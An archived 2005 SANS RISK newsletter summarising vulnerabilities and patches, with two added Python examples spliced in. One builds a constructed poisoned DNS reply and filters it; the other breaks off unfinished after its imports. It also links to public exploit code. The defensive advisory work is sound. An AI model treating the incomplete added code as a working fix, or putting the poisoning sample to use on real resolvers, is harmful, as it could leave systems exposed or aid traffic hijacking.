RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 14
From: The SANS Institute (ConsensusSecurityVulnerabilityAlert@sans.org)
Date: Fri Apr 08 2005 - 07:15:14 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
DNS Cache Poisoning appears to be a big and fast-growing problem.
Windows and Bind users should review number 1 below for a description of
the problem and how to block it. Separately, if you are using Windows
2003, definitely explore Service Pack 1 for a slew of important security
improvements.
Alan
*************************************************************************
RISK: The Consensus Security Vulnerability Alert
April 7, 2005 Vol. 4. Week 14
*************************************************************************
RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).
Summary of the vulnerabilities reported this week:
Platform                    # of Updates & Vulnerabilities
Windows                     1 (#6)
Other Microsoft Products    1 (#2)
Third Party Windows Apps    5 (#5)
Linux                       2
BSD                         1
Aix                         1
Unix                        3
Cross Platform              15 (#1, #3, #4, #7)
Web Application             8
______________________________________________________________________
****************** Sponsored by Secure Software *************************
SANS is happy to bring you the latest in our complimentary series of
Secure Software Webcasts. Database risks explored in depth at
https://www.sans.org/webcasts/show.php?webcastid=90568
*************************************************************************
Table of Contents:
Part I -- Critical Vulnerabilities from TippingPoint
(www.tippingpoint.com)
Widely Deployed Software
(1) HIGH: DNS Cache Poisoning Attacks
(2) MODERATE: Microsoft Jet Database Engine Overflow
(3) LOW: PHP getimagesize Denial of Service
Other Software
(4) CRITICAL: BakBone Netvault Backup Software Buffer Overflow
(5) HIGH: MailEnable IMAP Service Buffer Overflow
Updates
(6) Microsoft 2003 Service Pack 1
(7) Sybase Adaptive Server Enterprise Vulnerabilities
************************ Sponsored Links ********************************
Note: These links redirect to sites outside the SANS site.
1) Top Layer - 2005 NSS Group "Double Approval" for Rate &
Content-based Intrusion Prevention. Report
http://www.sans.org/info.php?id=752
2) Stop worm outbreaks without stopping your business. FREE Worm
Suppression white paper.
http://www.sans.org/info.php?id=753
*************************************************************************
Highlighted Training Program of the Week
Rocky Mountain SANS 2005, in Denver in May offers nine immersion tracks
plus short programs on Cutting Edge Hacker Techniques, Security Policy
Development, Security Awareness Training, and more. Wonderful teachers
give you material you can put to work immediately upon returning to the
office and present the most current tools and techniques. Details at
http://www.sans.org/rockymnt2005
What attendees say:
"SANS is the gold standard in network security training, in terms of
relevance of material, knowledgeable instructors, and sheer usefulness."
(Steve Keifling, SGI)
*************************************************************************
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)
-- Windows
05.14.1 - Windows Server 2003 Multiple Vulnerabilities
-- Other Microsoft Products
05.14.2 - Jet Database Engine Malformed Database File Buffer Overflow
-- Third Party Windows Apps
05.14.3 - BlueSoleil Object Push Service Directory Traversal
05.14.4 - RUMBA Profile Handling Multiple Buffer Overflow Vulnerabilities
05.14.5 - MailEnable Unspecified IMAP Vulnerability
05.14.6 - MailEnable Unspecified SMTP Denial of Service
05.14.7 - DameWare Mini Remote Control Server Privilege Escalation
-- Linux
05.14.8 - gdk-pixbuf Double Free Remote Denial of Service
05.14.9 - Gaim Jabber File Request Remote Denial of Service
-- BSD
05.14.10 - OpenBSD TCP Stack Denial of Service
-- Aix
05.14.11 - IBM AIX NIS Client Remote Vulnerability
-- Unix
05.14.12 - Remstats Remote Command Execution Vulnerability
05.14.13 - Gaim_Markup_Strip_HTML Remote Denial of Service
05.14.14 - Gaim IRC Protocol Plug-in Markup Language Injection
-- Cross Platform
05.14.15 - PHP Image File Format Remote Denial of Service
05.14.16 - PHP JPEG File Format Remote Denial of Service
05.14.17 - BakBone NetVault Remote Heap Overflow
05.14.18 - Quake 3 Engine Message Denial of Service
05.14.19 - Star Wars Jedi Knight: Jedi Academy Buffer Overflow
05.14.20 - Call of Duty United Offensive Denial of Service
05.14.21 - Acrobat Reader ActiveX Control LoadFile Information Disclosure
05.14.22 - Mozilla Suite/Firefox JavaScript Lambda Replace Memory Disclosure
05.14.23 - IBM iSeries AS400 LDAP Server Remote Information Disclosure
05.14.24 - CommuniGate Pro LIST Unspecified Denial of Service
05.14.25 - Sybase Adaptive Server Enterprise Remote Denial of Service
05.14.26 - Sybase Adaptive Server Enterprise Attrib_Valid Remote Buffer Overflow
05.14.27 - Sybase Adaptive Server Enterprise Declare Extension Buffer Overflow
05.14.28 - Sybase Adaptive Server Enterprise Convert Function Buffer Overflow
05.14.29 - PHP Nuke Downloads Cross-Site Scripting
-- Web Application
05.14.30 - PHPNuke Multiple Module Cross-Site Scripting Vulnerabilities
05.14.31 - Logics Software LOG-FT Arbitrary File Disclosure
05.14.32 - Comersus Cart Username Field HTML Injection
05.14.33 - RunCMS Remote Arbitrary File Upload Vulnerability
05.14.34 - Pavuk Multiple Unspecified Vulnerabilities
05.14.35 - PHP-Nuke Your_Account Module Avatarcategory Cross-Site Scripting
05.14.36 - PHP-Nuke Web_Links Module Multiple Cross-Site Scripting Vulnerabilities
05.14.37 - Active Auction House Multiple Cross-Site Scripting Vulnerabilities
______________________________________________________________________
PART I Critical Vulnerabilities
Part I is compiled by Rohit Dhamankar (rohitd_at_tippingpoint.com) at
TippingPoint, a division of 3Com, as a by-product of that company's
continuous effort to ensure that its intrusion prevention products
effectively block exploits using known vulnerabilities. TippingPoint's
analysis is complemented by input from a council of security managers
from twelve large organizations who confidentially share with SANS the
specific actions they have taken to protect their systems. A detailed
description of the process may be found at
http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk
************************
Widely Deployed Software
*************************
(1) HIGH: DNS Cache Poisoning Attacks
Affected:
Windows NT and Windows 2000 (prior to SP3) DNS servers in the default
configuration
The following configurations are also reportedly vulnerable and being
investigated:
Windows DNS server forwarding requests to a BIND DNS server running
version 4.x or 8.x
Windows DNS server forwarding requests to another vulnerable Windows DNS
server
Description: SANS Internet Storm Center (ISC) has been actively
analyzing reports of large-scale DNS cache poisoning attacks underway.
By performing the DNS cache poisoning, an attacker is able to direct
traffic intended for legitimate domains (for instance,
windowsupdate.com) to an IP address under the attacker's control. The
attacks have been used to re-direct popular domains belonging to a
number of financial, entertainment, travel, health and software
companies to the attackers' servers in order to install malware on the
user systems. The attacks are targeting flaws in the Symantec Gateway
security products (described in an earlier RISK newsletter), and the
forwarding configurations using Windows and BIND DNS servers listed
above.
Status: Microsoft has published an article KB241352 that describes how
to set up a registry key on Windows 2000 (prior to SP3) and NT 4.0 (SP4
and later) to harden a DNS server's configuration. An upgrade to version
9.x for the DNS forwarding servers running BIND is recommended. An
upgrade to Windows 2000 (SP3 or above) and Windows 2003 is recommended
for Windows DNS servers since these versions offer protection against
the cache poisoning attacks in their default configuration. Symantec has
already released updates for its DNS products that should be immediately
applied. ISC has also detailed steps on how to clean the current DNS
cache, which may be polluted.
Council Site Actions: Most of the reporting council sites are running
only UNIX-based DNS and BIND servers with safe configurations and thus
are not vulnerable to this issue. A few sites running Windows versions
have either confirmed their configurations are safe or have updated
them, as necessary. One site is implementing a rapid response plan based
on a previous risk assessment of this threat situation.
References:
ISC DNS Cache Poisoning Report
http://isc.sans.org/presentations/dnspoisoning.php
Microsoft KB241352
http://support.microsoft.com/default.aspx?scid=kb;en-us;241352
SANS Handler's Diary Postings
http://isc.sans.org/diary.php?date=2005-04-07
http://isc.sans.org/diary.php?date=2005-04-03
http://isc.sans.org/diary.php?date=2005-04-01
http://isc.sans.org/diary.php?date=2005-03-31
http://isc.sans.org/diary.php?date=2005-03-30
Symantec Gateway Products (patches available)
http://www.sans.org/newsletters/risk/display.php?v=4&i=11#widely1
[Editor's Note (Paller): The documentation of the DNS Cache Poisoning
problem is proof once again of the extraordinary value that comes from
security community participation and sharing. Organizations being
attacked share their logs with the Internet Storm Center where volunteer
incident handlers (recruited from among the best and brightest security
people in the world) perform deep analysis and bring in other experts.
They work together to provide early warnings to Internet users, with
sufficient analytical detail to enable vendors and users to act quickly
to remove or reduce a real threat.]
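The hardening the Status paragraph describes (a Windows "secure response" setting, or BIND 9 in place of 4.x/8.x) comes down to one rule: a resolver must only cache records that belong to the zone it actually asked about, so an unrelated A record smuggled into the additional section (for windowsupdate.com, say) is discarded instead of cached. The following is an added illustration, not code from the newsletter, ISC, Microsoft or ISC BIND: it parses a constructed DNS response in wire format and splits it into records a pollution-resistant cache would keep versus drop. The `zone` argument stands in for the zone the resolver delegated the query to; a real resolver derives that from its referral chain.

```python
"""Bailiwick filtering of DNS responses, modelled on the 'secure cache against
pollution' behaviour recommended above. Added example; stdlib only."""
import struct

TYPE_A, TYPE_NS = 1, 2
CLASS_IN = 1


def encode_name(name):
    """Encode a dotted name in uncompressed DNS wire format."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_response(qname, answers, authority, additional, txid=0x1234):
    """Assemble a minimal DNS response; records are (name, type, rdata) tuples."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1,
                         len(answers), len(authority), len(additional))
    body = encode_name(qname) + struct.pack("!HH", TYPE_A, CLASS_IN)
    for name, rtype, rdata in answers + authority + additional:
        body += encode_name(name)
        body += struct.pack("!HHIH", rtype, CLASS_IN, 300, len(rdata)) + rdata
    return header + body


def read_name(msg, off):
    """Decode the name at `off`, following RFC 1035 compression pointers."""
    labels, jumped, end = [], False, None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # pointer to an earlier name
            if not jumped:
                end = off + 2                     # resume after the pointer
            jumped = True
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels).lower(), (end if jumped else off)


def parse_response(msg):
    """Return (query name, {section: [(name, type, rdata), ...]})."""
    _txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off, qname = 12, None
    for _ in range(qd):
        qname, off = read_name(msg, off)
        off += 4                                  # skip qtype and qclass
    sections = {"answer": [], "authority": [], "additional": []}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = read_name(msg, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            sections[section].append((name, rtype, msg[off:off + rdlen]))
            off += rdlen
    return qname, sections


def in_bailiwick(name, zone):
    """True if `name` is `zone` itself or lies beneath it (label-aligned)."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def filter_response(msg, zone):
    """Split a response into records a pollution-resistant cache keeps vs. drops.
    `zone` is the zone this query was delegated to (assumption of this example)."""
    _qname, sections = parse_response(msg)
    keep, drop = [], []
    for section, records in sections.items():
        for name, rtype, rdata in records:
            target = keep if in_bailiwick(name, zone) else drop
            target.append((section, name, rtype, rdata))
    return keep, drop


def ip_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def sample_poisoned_response():
    """Constructed reply from example.com's nameserver carrying an unrelated
    A record in the additional section (documentation addresses only)."""
    return build_response(
        "www.example.com",
        answers=[("www.example.com", TYPE_A, ip_bytes("192.0.2.10"))],
        authority=[("example.com", TYPE_NS, encode_name("ns1.example.com"))],
        additional=[("ns1.example.com", TYPE_A, ip_bytes("192.0.2.53")),
                    # out-of-bailiwick glue: this is the poisoning payload
                    ("windowsupdate.com", TYPE_A, ip_bytes("198.51.100.66"))],
    )


if __name__ == "__main__":
    keep, drop = filter_response(sample_poisoned_response(), "example.com")
    for section, name, rtype, _ in keep:
        print("cache  ", section, name, rtype)
    for section, name, rtype, _ in drop:
        print("DISCARD", section, name, rtype)
```

A BIND 4.x/8.x-era resolver trusting the additional section would have cached the windowsupdate.com record; the filter keeps the three in-zone records and discards it.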
*******************************************************************
(2) MODERATE: Microsoft Jet Database Engine Overflow
Affected:
Jet Database Engine all versions
Description: The Jet Database Engine (Msjet40.dll) is Microsoft's
relational database engine that handles the entire task of database
processing for Microsoft Access and Visual Basic. This engine reportedly
contains a buffer overflow that can be triggered by a specially crafted
".mdb" Access database file. The flaw, according to the discoverer, can
be easily exploited to execute code on a Windows client system. In order
to exploit this flaw, an attacker has to supply the malicious .mdb file
via web, email, peer-to-peer sharing, etc. to the victim. Note that
Internet Explorer and other browsers do not automatically open the
attacker-supplied ".mdb" file. Hence, user interaction is required to
leverage this flaw. A proof-of-concept database file has been publicly
posted. The discoverer also mentions other denial-of-service flaws in
this DLL for which no technical details have been posted.
Status: Microsoft has not confirmed; no patches are available. The flaw
also affects third party applications that use msjet40.dll.
Council Site Actions: Most of the council sites are waiting for
confirmation and a patch from the vendor and plan to deploy the patch
once available. One site commented they have no plans to patch at this
time, and will instead rely on their implementation of the Cisco
Security Agent to prevent this exploit from occurring.
References:
Posting by HexView (the discoverer)
http://archives.neohapsis.com/archives/fulldisclosure/2005-03/0895.html
Microsoft Jet Database Engine Overview
http://msdn.microsoft.com/archive/en-us/dnaraccessdev/html/odc_jetdatabaseengine20ausersoverview.asp
SecurityFocus BID
http://www.securityfocus.com/bid/12960
****************************************************************
(3) LOW: PHP getimagesize Denial of Service
Affected:
PHP versions prior to 4.3.11 and 5.0.4
Description: PHP, the popular scripting language for web servers,
contains two vulnerabilities in its "getimagesize()" function. This
function is used to compute the size of many image formats such as GIF,
JPEG, etc. An attacker can exploit these flaws to cause a denial of
service to any web server that is using PHP scripts (and the
getimagesize() function) to process user-supplied images. The
technical details required to craft a malicious image file have been
publicly posted.
Status: Upgrade to PHP version 4.3.11 or 5.0.4.
Council Site Actions: Only one of the reporting council sites is using
the affected software and feature. Their servers will be updated through
a vendor patch (e.g., a patch associated with a Linux distribution)
rather than updated with software obtained directly from www.php.net.
References:
iDefense Advisory
http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities
Vendor Homepage
http://www.php.net/
SecurityFocus BIDs
http://www.securityfocus.com/bid/12962
****************************************************************
************************
Other Software
***********************
(4) CRITICAL: BakBone Netvault Backup Software Buffer Overflow
Affected:
NetVault version 7.3 and earlier on various platforms
Description: Bakbone Netvault is a backup solution for environments
running UNIX, Linux, Windows NT/2000/2003 or Netware. The software is
reportedly being used by AT&T, Los Alamos National Laboratory and many
other large enterprises. The implementation of the communication
protocol between the Netvault client (the system being backed up) and
the server (the system backing up the data) contains a heap-based buffer
overflow. By sending specially crafted packets to the port 20031/tcp,
an attacker can execute arbitrary code on the system running this
software. Exploit code for leveraging this flaw on Windows platforms is
publicly available.
Status: Vendor not confirmed, no updates available. A workaround is to
block the ports 20031/tcp and 20031/udp (the Netvault default ports) at
the network perimeter. Increased scanning activity has been noticed for
the port 20031/tcp.
Council Site Actions: The affected software is not in production or
widespread use, or is not officially supported at any of the council
sites. They reported that no action was necessary.
References:
http://class101.org/netv-remhbof.pdf
Exploit Code
http://class101.org/36/55/462/101_netvault.zip
Typical Netvault Port Configuration
http://www.bakbone.com/docs/NetVault%20Configurator%20Guide7_1.pdf
Vendor Homepage
http://www.bakbone.com/
SecurityFocus BID
http://www.securityfocus.com/bid/12967/
****************************************************************
(5) HIGH: MailEnable IMAP Service Buffer Overflow
Affected:
MailEnable Enterprise version 1.04 and prior
MailEnable Professional version 1.54 and prior
Description: MailEnable, a Windows-based mail server, contains buffer
overflows in its IMAP server (MEIMAPS.EXE). An unauthenticated attacker
can trigger the flaw by sending an overlong argument to the
"AUTHENTICATE" or "LOGIN" commands. The flaws can be exploited to
execute arbitrary code with the privileges of the IMAP server. Exploit
code has been publicly posted.
Status: Vendor has confirmed the buffer overflow in the "AUTHENTICATE"
command and released hotfixes. The status of hotfixes for the "LOGIN"
command overflow is unknown.
Council Site Actions: The affected software is not in production or
widespread use, or is not officially supported at any of the council
sites. They reported that no action was necessary.
References:
Posting by Expanders
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0078.html
Posting by H.D. Moore
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0099.html
Vendor Homepage
http://www.mailenable.com
SecurityFocus BIDs
http://www.securityfocus.com/bid/12995
http://www.securityfocus.com/bid/13040
****************************************************************
****************
Updates
****************
(6) Windows 2003 Service Pack 1
Microsoft has released Service Pack 1 for Windows 2003. This update
includes many security features such as Windows firewall, enhanced
memory checks to protect against buffer overflows, protection from
malicious e-mail and more authentication checks for RPC services.
References:
http://www.microsoft.com/WindowsServer2003/downloads/servicepacks/sp1/sp1datasheet.mspx
******************************************************************
(7) Sybase Adaptive Server Enterprise Vulnerabilities
After an initial push back from Sybase, NGSSoftware has finally released
the technical details regarding the vulnerabilities in the Sybase
Adaptive Server Enterprise that were patched in December 2004. The
Sybase administrators should apply the patches as soon as possible, if
they have not already done so.
References:
NGSSoftware Posting
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0002.html
Previous
RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=3&i=51#other1
***********************************************************************
SANS@HOME Program
When a live conference is not an option due to cost, time away or visa
issues, try SANS@HOME Weekly Webcasts. Great course leaders, same
material, great way to learn, and less expensive. For details, go to
http://www.sans.org/athome
***********************************************************************
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 14, 2005
This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4201 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.
______________________________________________________________________
05.14.1 CVE: Not Available
Platform: Windows
Title: Windows Server 2003 Multiple Vulnerabilities
Description: Microsoft Windows Server 2003 SP1 was released to address
multiple vulnerabilities. Please see vendor release notes for
details.
Ref: http://www.microsoft.com/windowsserver2003/downloads/servicepacks/sp1/default.mspx
______________________________________________________________________
05.14.2 CVE: CAN-2004-0197
Platform: Other Microsoft Products
Title: Jet Database Engine Malformed Database File Buffer Overflow
Description: Microsoft Jet Database Engine (Jet) is used to provide
data access to various applications. It is reported to be vulnerable
to a buffer overflow issue due to improper boundary checks of
user-supplied database file contents. "msjet40.dll" library version
4.00.8618.0 and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12960
______________________________________________________________________
05.14.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: BlueSoleil Object Push Service Directory Traversal
Description: BlueSoleil, a bluetooth software package, is reported
vulnerable to directory traversal attacks in its Object Push Service.
Clients can specify the destination directory for uploads using
directory traversal sequences. Attackers can leverage this to install
trojans on the vulnerable system.
Ref: http://www.digitalmunition.com/DMA%5B2005-0401a%5D.txt
______________________________________________________________________
05.14.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: RUMBA Profile Handling Multiple Buffer Overflow Vulnerabilities
Description: RUMBA provides information that may be accessed from any
desktop or server-managed client. Insufficient sanitization of the
"SysName" value in an RTO profile and a section of the WPA profile
exposes the software to a buffer overflow issue. RUMBA version 7.3 is
affected.
Ref: http://www.securityfocus.com/archive/1/394800
______________________________________________________________________
05.14.5 CVE: CAN-2005-0804
Platform: Third Party Windows Apps
Title: MailEnable Unspecified IMAP Vulnerability
Description: MailEnable is a commercially available mail server. It is
vulnerable to an unspecified remote security issue in the server's
IMAP implementation. All unpatched versions of MailEnable Enterprise
Edition and MailEnable Professional 1.5 and later are vulnerable.
Ref: http://www.mailenable.com/hotfix/
______________________________________________________________________
05.14.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: MailEnable Unspecified SMTP Denial of Service
Description: MailEnable is a mail server for the Microsoft Windows
platform. It is reported to be vulnerable to an unspecified issue that
may allow remote attackers to crash the SMTP service. MailEnable
Professional 1.54, MailEnable Enterprise Edition 1.0.4 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12994
______________________________________________________________________
05.14.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: DameWare Mini Remote Control Server Privilege Escalation
Description: DameWare Mini Remote Control Server is a remote
administration tool. It is reported to be vulnerable to a remote
privilege escalation issue. DameWare Mini Remote Control Server
version 4.8 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13023
______________________________________________________________________
05.14.8 CVE: CAN-2005-0891
Platform: Linux
Title: gdk-pixbuf Double Free Remote Denial of Service
Description: gdk-pixbuf is a GNOME library. It is vulnerable to a
denial of service vulnerability when handling malformed bitmap image
files. gdk-pixbuf version 0.22.0 and gtk2 version 2.4.14 are
vulnerable.
Ref: http://rhn.redhat.com/errata/RHSA-2005-344.html
______________________________________________________________________
05.14.9 CVE: CAN-2005-0967
Platform: Linux
Title: Gaim Jabber File Request Remote Denial of Service
Description: Gaim is an instant messaging client that supports
numerous protocols. It is vulnerable to a remote denial of service
issue which can be exploited by an attacker to crash the application.
Gaim versions 1.2.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/advisories/8368
______________________________________________________________________
05.14.10 CVE: CAN-2005-0960
Platform: BSD
Title: OpenBSD TCP Stack Denial of Service
Description: OpenBSD TCP stack is vulnerable to a denial of service
issue when processing invalid SACK options. OpenBSD versions 3.5 and
3.6 are vulnerable.
Ref: http://www.openbsd.org/errata.html#sack
______________________________________________________________________
05.14.11 CVE: Not Available
Platform: Aix
Title: IBM AIX NIS Client Remote Vulnerability
Description: NIS is designed to assist in the administration of
networks. IBM AIX NIS client is affected by a remote arbitrary code
execution issue which could allow remote attackers to gain
unauthorized access to a vulnerable machine with superuser privileges.
IBM AIX version 5.3 is affected.
Ref: http://www.securityfocus.com/bid/13022/info/
______________________________________________________________________
05.14.12 CVE: CAN-2005-0388
Platform: Unix
Title: Remstats Remote Command Execution Vulnerability
Description: Remstats is a suite of applications designed for network
data gathering and presentation. A remote command execution
vulnerability affects Remstats' "remoteping" service. Attackers could
use this towards a system compromise.
Ref: http://www.securityfocus.com/advisories/8351
______________________________________________________________________
05.14.13 CVE: CAN-2005-0965
Platform: Unix
Title: Gaim_Markup_Strip_HTML Remote Denial of Service
Description: Gaim is an instant messaging client that supports
numerous protocols. It is reported vulnerable to a remote denial of
service condition. It is reported that the issue exists in the
"gaim_markup_strip_html" function and leads to an application crash.
This vulnerability is reported to affect Gaim versions 1.2.0 and
earlier.
Ref: http://gaim.sourceforge.net/security/?id=13
______________________________________________________________________
05.14.14 CVE: CAN-2005-0966
Platform: Unix
Title: Gaim IRC Protocol Plug-in Markup Language Injection
Description: Gaim is an instant messaging client. Insufficient
sanitization of user-supplied input exposes the client to numerous
markup language injection issues. Gaim versions 1.2.0 and earlier are
affected.
Ref: http://gaim.sourceforge.net/security/?id=14
______________________________________________________________________
05.14.15 CVE: CAN-2005-0524
Platform: Cross Platform
Title: PHP Image File Format Remote Denial of Service
Description: PHP is affected by a remote denial of service
vulnerability. The issue occurs due to a failure to properly validate
user-controlled file data in the "php_handle_iff()" function. PHP
versions 5.0.3 and earlier are known to be vulnerable.
Ref: http://www.php.net/release_4_3_11.php
______________________________________________________________________
05.14.16 CVE: CAN-2005-0525
Platform: Cross Platform
Title: PHP JPEG File Format Remote Denial of Service
Description: A remote denial of service vulnerability affects PHP. The
problem presents itself when the affected application attempts to
parse a maliciously crafted JPEG file. This occurs due to a failure to
properly validate image header data in the "php_handle_jpeg()"
function defined in "ext/standard/image.c". PHP versions 4.2.2, 4.3.9,
4.3.10 and 5.0.3 are affected.
Ref: http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities
______________________________________________________________________
05.14.17 CVE: Not Available
Platform: Cross Platform
Title: BakBone NetVault Remote Heap Overflow
Description: NetVault is a backup and restore solution. It is reported
to be vulnerable to a remote heap overflow issue due to improper
sanitization of user-supplied input to the "Clientname" variable.
BakBone NetVault versions 7.1 and 7.0 are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12967
______________________________________________________________________
05.14.18 CVE: CAN-2005-0430
Platform: Cross Platform
Title: Quake 3 Engine Message Denial of Service
Description: Quake 3 is a game produced by iD Software. The engine
allows remote attackers to cause a denial of service issue including a
remote shutdown of the game server and possible crash by sending a
long infostring. All games using the Quake 3 engine as mentioned in
the link are affected.
Ref: http://www.securityfocus.com/archive/1/394823
______________________________________________________________________
05.14.19 CVE: Not Available
Platform: Cross Platform
Title: Star Wars Jedi Knight: Jedi Academy Buffer Overflow
Description: Star Wars Jedi Knight: Jedi Academy is a game developed
by Raven Software. It is vulnerable to a stack-based buffer overflow
issue that can be exploited remotely by an attacker to run arbitrary
code on the server. Star Wars Jedi Knight: Jedi Academy 1.0.11 is
vulnerable.
Ref: http://www.securityfocus.com/archive/1/394824
______________________________________________________________________
05.14.20 CVE: Not Available
Platform: Cross Platform
Title: Call of Duty United Offensive Denial of Service
Description: Call of Duty and Call of Duty United Offensive are a
series of games. They are reported to be vulnerable to a denial of
service issue due to improper boundary checks. Call of Duty United
Offensive versions 1.5.1b and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12978
______________________________________________________________________
05.14.21 CVE: CAN-2005-0035
Platform: Cross Platform
Title: Acrobat Reader ActiveX Control LoadFile Information Disclosure
Description: Adobe Acrobat Reader is an application designed for
reading Portable Document Format (PDF) files. Adobe Acrobat Reader
ActiveX control is affected by an information disclosure
vulnerability. Adobe Acrobat Reader versions 7.0 and earlier are known
to be vulnerable.
Ref: http://www.adobe.com/support/techdocs/331465.html
http://www.adobe.com/support/techdocs/331468.html
______________________________________________________________________
05.14.22 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Suite/Firefox JavaScript Lambda Replace Memory Disclosure
Description: Mozilla Suite/Firefox are reported vulnerable to a memory
disclosure vulnerability. This issue can allow a remote attacker to
disclose arbitrary heap memory. Firefox versions 1.0.1 and 1.0.2 are
reported vulnerable. Mozilla version 1.7.6 is vulnerable as well.
Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=288688
______________________________________________________________________
05.14.23 CVE: Not Available
Platform: Cross Platform
Title: IBM iSeries AS400 LDAP Server Remote Information Disclosure
Description: IBM iSeries AS400 is an enterprise server solution. Due
to a problem in the implementation of the LDAP server, the software is
exposed to a remote information disclosure issue where user names and
account information can be accessed by unauthorized users. All current
versions are affected.
Ref: http://www.venera.com/downloads/AS400_ldap_user_accounts_disclosure.pdf
______________________________________________________________________
05.14.24 CVE: Not Available
Platform: Cross Platform
Title: CommuniGate Pro LIST Unspecified Denial of Service
Description: CommuniGate Pro is an Internet messaging server.
Communigate Pro is affected by an unspecified denial of service
vulnerability. Communigate Pro versions 4.3 c2 and earlier are known
to be vulnerable.
Ref: http://www.stalker.com/CommuniGatePro/History.html
______________________________________________________________________
05.14.25 CVE: CAN-2005-0942
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Remote Denial of Service
Description: Sybase Adaptive Server Enterprise is a full SQL
relational database management system. It is affected by a remote
denial of service vulnerability due to a failure of the affected
application to properly handle malformed network data. A remote
attacker can leverage this issue to cause the affected server to
crash, denying service to legitimate users. ASE versions 12.5.3 and
earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/385198
______________________________________________________________________
05.14.26 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Attrib_Valid Remote Buffer Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. A buffer overflow vulnerability affects the
"attrib_valid" Transact-SQL extension function. An attacker may
exploit this issue to execute arbitrary code with the privileges of
the affected application. The vendor has released Adaptive Enterprise
Server 12.5.3 ESD#1 to address this issue.
Ref: http://www.ngssoftware.com/advisories/sybase-ase.txt
______________________________________________________________________
05.14.27 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Declare Extension Buffer Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. A remote buffer overflow vulnerability affects
Sybase Adaptive Server Enterprise. Attackers can leverage this towards
remote code execution or a denial of service condition.
Ref: http://www.securityfocus.com/archive/1/395001
______________________________________________________________________
05.14.28 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Convert Function Buffer
Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. It is reported to be vulnerable to a remote buffer
overflow issue due to improper sanitization of user-supplied input to
the "convert" function. Sybase Adaptive Server Enterprise versions
12.5.3 and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13015
______________________________________________________________________
05.14.29 CVE: Not Available
Platform: Cross Platform
Title: PHP Nuke Downloads Cross-Site Scripting
Description: PHP-Nuke is a content management system. The PHP-Nuke
"Downloads" module is vulnerable to a cross-site scripting issue because
the application fails to properly sanitize user-supplied URI input.
PHP-Nuke versions 7.6 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/394971
______________________________________________________________________
05.14.30 CVE: Not Available
Platform: Web Application
Title: PHPNuke Multiple Module Cross-Site Scripting Vulnerabilities
Description: PHPNuke is a web-based portal system. It is reported to
be vulnerable to a cross-site scripting issue due to improper
sanitization of user-supplied input. PHPNuke versions 7.6 and earlier
are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12983
______________________________________________________________________
05.14.31 CVE: Not Available
Platform: Web Application
Title: Logics Software LOG-FT Arbitrary File Disclosure
Description: LOG-FT is a web-based application that is used to
transfer files to and from mainframe servers. It is vulnerable to a
file disclosure vulnerability via the "VAR_FT_LANG" and "VAR_FT_TMPL"
parameters. All versions of Logics Software LOG-FT are vulnerable.
Ref: http://www.securityfocus.com/archive/1/394969
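The bulletin does not say how the two parameters are abused. The example
below is added here and is not LOG-FT code: it assumes the common pattern
behind this class of bug, a request parameter whose value selects a
language or template file on disk, and shows the unsafe lookup beside a
hardened one that treats the parameter as an allowlist key rather than a
path and still verifies the resolved file lies under the template
directory. The directory layout, file names and the traversal value are
constructed for the example; Python is used so it runs stand-alone.

```python
"""Hypothetical template lookup keyed by a request parameter, in the
style of VAR_FT_LANG / VAR_FT_TMPL. Not LOG-FT code: the directory
layout, file names and the traversal payload are constructed here."""
import os
import re
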